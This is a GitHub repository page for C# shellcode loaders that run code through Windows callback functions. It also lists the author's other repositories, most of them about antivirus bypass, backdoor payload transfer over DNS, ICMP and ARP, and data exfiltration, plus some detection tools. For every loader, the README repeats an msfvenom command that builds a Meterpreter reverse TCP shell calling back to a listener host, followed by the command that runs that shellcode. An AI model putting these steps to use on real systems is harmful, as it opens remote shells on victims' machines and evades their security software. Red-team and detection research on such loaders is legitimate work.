• Stars
    star
    114
  • Rank 308,031 (Top 7 %)
  • Language
    C#
  • Created over 3 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions Technique, without CreateThread Native API)

NativePayload_CBT

NativePayload_CallBackTechniques C# Codes (Code Execution via Callback Functions, without CreateThread Native API)

Note: These C# Codes Tested by .Net Framework 3.5 or 4.0 only ;) & some of Codes are ready but i will Publish almost all of them from S4R1N & ChaitanyaHaritash C++ repo soon...

Note: These Useful Techniques made by Security Researcher "@S4R1N" also Codes [13,14,15] made by Security Researcher "Chaitanya Haritash"

Special Thanks to "S4R1N" for Original C++ Source: https://github.com/S4R1N/AlternativeShellcodeExec

Special Thanks to "Chaitanya Haritash" for Original C++ Source: https://github.com/ChaitanyaHaritash/Callback_Shellcode_Injection

Video: https://www.youtube.com/watch?v=k473K7lWc5Q


My article for Call/Invoke C# Async Codes/Methods via Native Callback Functions (NativePayload_AsyncM* Codes)

Link1: https://damonmohammadbagher.github.io/Posts/29mar2021x.html

Link2: https://www.linkedin.com/pulse/callinvoke-async-c-method-via-callback-function-apis-mohammadbagher/

!    NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)
!    NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)
!    NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)

C# Codes: "New C# codes for Callback Functions will publish here soon..."

+    1. NativePayload_ImageGetDigestStream.cs
+    2. NativePayload_EnumWindows.cs
+    3. NativePayload_EnumWindowStationsW.cs
+    4. NativePayload_EnumResourceTypesW.cs
+    5. NativePayload_EnumChildWindows.cs
+    6. NativePayload_EnumDisplayMonitors.cs
+    7. NativePayload_EnumPageFilesW.cs
+    8. NativePayload_EnumPropsExW.cs
+    9. NativePayload_EnumerateLoadedModules.cs
+    10. NativePayload_CreateThreadPoolWait.cs
+    11. NativePayload_CreateTimerQueueTimer.cs
+    12. NativePayload_SymInitialize.cs
+    13. NativePayload_EnumSystemCodePagesA.cs  (by ChaitanyaHaritash)
+    14. NativePayload_EnumSystemLocalesA.cs  (by ChaitanyaHaritash)
+    15. NativePayload_EnumUILanguagesA.cs  (by ChaitanyaHaritash)
!    16. NativePayload_AsyncMethodEUILA.cs  (Async C# Method + EnumUILanguagesA)
!    17. NativePayload_AsyncMEnumSystemLocalesA.cs  (Async C# Method + EnumSystemLocalesA)
!    18. NativePayload_AsyncMEnumDisplayMonitors.cs  (Async C# Method + EnumDisplayMonitors)

NativePayload_CBT.cs (Some of Callback Function Codes/Techniques in one code)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CBT.exe [1,2,3,4,5] [payload...]
Techniques: 1 => ImageGetDigestStream , 2 => EnumWindows , 3 => EnumWindowStationsW , 4 => EnumResourceTypesW , 5 => EnumChildWindows 
example: NativePayload_CBT.exe 3 "fc,48,00,87,00,...."


  1. NativePayload_ImageGetDigestStream.cs (Callback Functions Technique via ImageGetDigestStream Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_ImageGetDigestStream.exe  [payload...]
example: NativePayload_ImageGetDigestStream.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumWindows.cs (Callback Functions Technique via EnumWindows Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumWindows.exe  [payload...]
example: NativePayload_EnumWindows.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumWindowStationsW.cs (Callback Functions Technique via EnumWindowStationsW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumWindowStationsW.exe  [payload...]
example: NativePayload_EnumWindowStationsW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumResourceTypesW.cs (Callback Functions Technique via EnumResourceTypesW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumResourceTypesW.exe  [payload...]
example: NativePayload_EnumResourceTypesW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumChildWindows.cs (Callback Functions Technique via EnumChildWindows Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumChildWindows.exe  [payload...]
example: NativePayload_EnumChildWindows.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumDisplayMonitors.exe  [payload...]
example: NativePayload_EnumDisplayMonitors.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumPageFilesW.cs (Callback Functions Technique via EnumPageFilesW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumPageFilesW.exe  [payload...]
example: NativePayload_EnumPageFilesW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumPropsExW.cs (Callback Functions Technique via EnumPropsExW Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumPropsExW.exe  [payload...]
example: NativePayload_EnumPropsExW.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumerateLoadedModules.cs (Callback Functions Technique via EnumerateLoadedModules/W64 Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumerateLoadedModules.exe  [payload...]
example: NativePayload_EnumerateLoadedModules.exe "fc,48,00,87,00,...."


  1. NativePayload_CreateThreadPoolWait.cs (Callback Functions Technique via CreateThreadPoolWait Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CreateThreadPoolWait.exe  [payload...]
example: NativePayload_CreateThreadPoolWait.exe "fc,48,00,87,00,...."


  1. NativePayload_CreateTimerQueueTimer.cs (Callback Functions Technique via CreateTimerQueueTimer Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_CreateTimerQueueTimer.exe  [payload...]
example: NativePayload_CreateTimerQueueTimer.exe "fc,48,00,87,00,...."


  1. NativePayload_SymInitialize.cs (Callback Functions Technique via SymInitialize Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_SymInitialize.exe  [payload...]
example: NativePayload_SymInitialize.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumSystemCodePagesA.cs (Callback Functions Technique via EnumSystemCodePagesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumSystemCodePagesA.exe  [payload...]
example: NativePayload_EnumSystemCodePagesA.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumSystemLocalesA.exe  [payload...]
example: NativePayload_EnumSystemLocalesA.exe "fc,48,00,87,00,...."


  1. NativePayload_EnumUILanguagesA.cs (Callback Functions Technique via EnumUILanguagesA Native API)

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_EnumUILanguagesA.exe  [payload...]
example: NativePayload_EnumUILanguagesA.exe "fc,48,00,87,00,...."


  1. NativePayload_AsyncMethodEUILA.cs (Callback Functions Technique via EnumUILanguagesA API + Async Csharp Method)

Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMethodEUILA.exe  [payload...]
example: NativePayload_AsyncMethodEUILA.exe "fc,48,00,87,00,...."


  1. NativePayload_AsyncMEnumSystemLocalesA.cs (Callback Functions Technique via EnumSystemLocalesA API + Async Csharp Method)

Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMEnumSystemLocalesA.exe  [payload...]
example: NativePayload_AsyncMEnumSystemLocalesA.exe "fc,48,00,87,00,...."


  1. NativePayload_AsyncMEnumDisplayMonitors.cs (Callback Functions Technique via EnumDisplayMonitors API + Async Csharp Method)

Note: it means we can use Callback Native API functions to Invoke C# Codes/Methods (like async call) etc.

usage:

step1: [linux] msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.56.1 lport=4444 -f c > payload.txt
step2: [win] NativePayload_AsyncMEnumDisplayMonitors.exe  [payload...]
example: NativePayload_AsyncMEnumDisplayMonitors.exe "fc,48,00,87,00,...."


More Repositories

1

eBook-BypassingAVsByCSharp

eBook "Bypassing AVS by C#.NET Programming" (Free Chapters only)
458
star
2

ETWProcessMon2

ETWProcessMon2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
C#
291
star
3

NativePayload_DNS

C# code for Transferring Backdoor Payloads by DNS Traffic and Bypassing Anti-viruses
C#
265
star
4

NativePayloads

All my Source Codes (Repos) for Red-Teaming & Pentesting + Blue Teaming
C#
222
star
5

NativePayload_Reverse_tcp

Meterpreter Encrypted Payload by C#
C#
160
star
6

Meterpreter_Payload_Detection

Meterpreter_Payload_Detection.exe tool for detecting Meterpreter in memory like IPS-IDS and Forensics tool
C#
159
star
7

NativePayload_ReverseShell

This is Simple C# Source code to Bypass almost "all" AVS, (kaspersky v19, Eset v12 v13 ,Trend-Micro v16, Comodo & Windows Defender Bypassed via this method Very Simple)
C#
109
star
8

Some_Pentesters_SecurityResearchers_RedTeamers

Some Pentesters, Security Researchers, Red Teamers which i learned from them a lot...
103
star
9

NativePayload_Image

Transferring Backdoor Payloads with BMP Image Pixels
Shell
79
star
10

NativePayload_PE1

NativePayload_PE1/PE2 , Injecting Meterpreter Payload bytes into local Process via Delegation Technique + in-memory with delay Changing RWX to X or RX or (both) [Bypassing AVs]
C#
57
star
11

NativePayload_BSSID

Transferring Backdoor Payload by BSSID and Wireless traffic
Shell
55
star
12

NativePayload_DNS2

C# code for Transferring Backdoor Payloads by DNS Traffic (A - PTR Records) and Bypassing Anti-viruses
C#
45
star
13

NativePayload_ARP

C# code for Transferring Backdoor Payloads by ARP Traffic and Bypassing Anti-viruses (Slow)
C#
43
star
14

Videos-BypassingAVsByCSharp

Video files for eBook: "Bypassing AVs by C#.NET Programming"
41
star
15

ETWNetMonv3

ETWNetMonv3 is simple C# code for Monitoring TCP Network Connection via ETW & ETWProcessMon/2 is for Monitoring Process/Thread/Memory/Imageloads/TCPIP via ETW + Detection for Remote-Thread-Injection & Payload Detection by VirtualMemAlloc Events (in-memory) etc.
C#
38
star
16

NativePayload_IP6DNS

C# code for Transferring Backdoor Payloads by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses
C#
31
star
17

NativePayload_ICMP

C# code for Transferring Backdoor Payloads by ICMPv4 Traffic and bypassing Anti-Viruses
C#
29
star
18

FakeFileMaker

Social Engineering: Simple way to make a fake file for Backdoors
C#
24
star
19

BEV4

BasicEventViewer4 (BEV v4.0), this code will useful for All Blue/Purple Teams , RealTime Monitoring Sysmon Events , Mitre Attack Detections via yaml files
C#
16
star
20

NativePayload_HTTP

Data Exfiltration via HTTP Traffic (C# and Shell Script)
Shell
16
star
21

NativePayload_ARP2

Simple Script "NativePayload_ARP2.sh" for Sending DATA via ARP Bcast Traffic to all systems in (LAN) by "Vid" tag
Shell
13
star
22

NativePayload_Tinjection

Remote Thread Injection by C# + Delegate Techniques
C#
12
star
23

NativePayload_TiACBT

NativePayload_TiACBT (Remote Thread Injection + C# Async Method + CallBack Functions Technique)
C#
12
star
24

NativePayload_DIM

NativePayload_DIM Dynamic native dll Injection in Memory , Injecting Native DLL bytes to local Process
C#
11
star
25

NativePayload_DCP

Compiling Csharp in-memory and Execute to bypass AVs
C#
11
star
26

Exfiltration-and-Uploading-DATA-by-DNS-Traffic-AAAA-Records-

Pdf File : Exfiltration and Uploading DATA by DNS Traffic (AAAA Records)
10
star
27

RedbudTree

DNS IPv6 Request Listener (UDP Port 53) for Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests
C#
9
star
28

eBook_Bypassing-Antiviruses-by-C-Programming-v2.0

bypassing Anti-viruses by csharp programming v2.0
9
star
29

NativePayload_LocalCreateThread7

Chunking CobaltStrike Payloads + Jump Method
C#
9
star
30

FSWatch

File System Watcher via C# (Monitoring File Activity , Create/Delete/Change/Rename events + some Activity like Size/Attribute/Security Changes & LastAccess, LastWrite etc...)
C#
8
star
31

damonmohammadbagher.github.io

HTML
8
star
32

NativePayload_CTX

NativePayload_CTX Create Thread via _beginthreadex function in msvcrt.dll
C#
8
star
33

TCPMon

TCPMon v3.1 or (4.0) was a very old Code which made by me in C# for Monitoring TCP Connection via Native APIs (was fun in that time ;D)
C#
7
star
34

Payload-hiding-Method-via-Infecting-Target-Process-Memory

HTML
7
star
35

NativePayload_TId

Remote Thread Injection by C# Delegate
C#
7
star
36

NativePayload_CDynApp3

Loading Csharp C2 Client-side codes in RAM by Very Simple New Technique to avoid Detection
C#
7
star
37

NativePayload_RefPtr1

NativePayload_RefPtr1 Indirect call csharp method in memory [without call c# method in source code directly]
C#
5
star
38

NativePayload_ASM3

NativePayload_ASM/AsynASM , Injecting Meterpreter Payload bytes into local Process via Delegation Technique [Technique D] + in-memory with delay Changing RWX to X [Bypassing AVs]
C#
5
star
39

NativePayload_MP

C# Backdoor & Mapper/Proxy tool (backdoor & proxy tool working in memory only)
C#
4
star
40

Manifest-Creator

C# tool for make XML report from Network Hosts (report contains: Cpu,Bios,Motherboard,Vga,Sound,Hdd,Ram,Display-Monitor,IpAddress,Os,Users,...)
C#
4
star
41

NativePayload_DynLCI

NativePayload_DynLCI , Dynamic Local Code Invoke , Injecting Meterpreter Payload bytes into local Process
C#
4
star
42

NativePayload_JMP4

in C# you can use Emit(Opcodes.jmp,TargetMethod) in your codes without writing any asm bytes in code to jump to pointer of TargetMethod or (MethodInfo) to run in-memory via Emit(Opcodes.jmp, method) in system.reflection namespace
C#
4
star
43

NativePayload_NetMonitor

NativePayload_NetMonitor Monitoring NetworkTraffic over [ICMP/ARP/TCP/UDP + HTTP + DNS] by ws2_32.dll Windows Sockets Library
C#
3
star
44

BEV3

BasicEventViewer (BEV v3.0), this code will useful for All Blue Teamers.
C#
2
star
45

DamonMohammadbagher

2
star
46

NativePayload_DYN

Compiling Csharp in-memory and Execute to bypass AVs
C#
2
star
47

NativePayload_PingSend

NativePayload_PingSend send data/string (exfiltration) to destination ip via icmp ping packets
C#
1
star